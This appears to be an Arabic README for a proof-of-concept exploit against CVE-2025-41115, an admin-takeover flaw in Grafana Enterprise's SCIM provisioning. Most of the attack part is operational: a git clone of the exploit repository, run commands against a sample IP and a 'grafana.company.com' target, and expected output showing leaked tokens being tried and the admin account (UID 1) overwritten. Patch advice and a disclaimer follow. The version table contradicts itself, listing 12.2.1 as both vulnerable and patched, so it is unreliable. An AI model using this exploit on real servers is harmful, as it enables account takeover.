
CVE-2025-41115

ثغرة تصعيد امتيازات SCIM الحرجة في Grafana Enterprise
CVE-2025-41115 هي ثغرة حرجة (CVSS 10.0) في Grafana Enterprise تؤثر على ميزة توفير مستخدمي SCIM.
عندما يكون توفير SCIM مفعّلاً و user_sync_enabled = true، يمكن لعميل SCIM خبيث إرسال قيمة رقمية لـ externalId، والتي يقوم Grafana بتعيينها خطأً إلى معرف مستخدم داخلي — مما يسمح للمهاجم بـ انتحال أو الكتابة فوق الحسابات الموجودة، بما في ذلك حسابات المسؤولين.
⚠️ إصدار Grafana OSS غير متأثر.
الشروط المطلوبة للاستغلال:
enableSCIM = true[auth.scim] user_sync_enabled = true| الإصدار | الحالة |
|---|---|
| 12.0.0 → 12.2.1 | ❌ ضعيفة |
| 12.3.0 | ✅ مُصحح |
| 12.2.1 (إصدار مُصحح) | ✅ مُصحح |
| 12.1.3 | ✅ مُصحح |
💡 خدمات Grafana المُدارة (AWS/Azure/Grafana Cloud) تم تصحيحها بواسطة البائعين.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
أو فقط انسخ والصق السكربت أعلاه في ملف
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# أو
python3 CVE-2025-41115.py https://grafana.company.com
عندما يعمل الاستغلال فعليًا (أي أن الهدف ضعيف والرمز صالح)، سترى مخرجات مطابقة تمامًا لهذا: نص
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
قم بالتحديث إلى 12.3.0 أو أحد إصدارات الصيانة المصححة.
إذا كنت لا تستخدم توفير SCIM، فتأكد من أن لديك:
enableSCIM = false
أو
[auth.scim]
user_sync_enabled = false
ابحث عن:
externalId رقميتأكد من السماح فقط لموفرات الهوية الموثوقة بالتواصل مع نقطة نهاية SCIM الخاصة بك.
راقب عمليات تسجيل الدخول المشبوهة، أو أحداث إنشاء المستخدمين، أو الاستيلاء على حسابات المسؤولين.
إن إثبات المفهوم (PoC) هذا مخصص لاختبار الأمان المصرح به والاستخدام التعليمي فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى ملاحقة جنائية. لا يتحمل المؤلف والموزع أي مسؤولية عن إساءة الاستخدام. قم بالتصحيح فورًا (≥12.0.6 / 12.3.0+).
| 12.0.6 |
| ✅ مُصحح |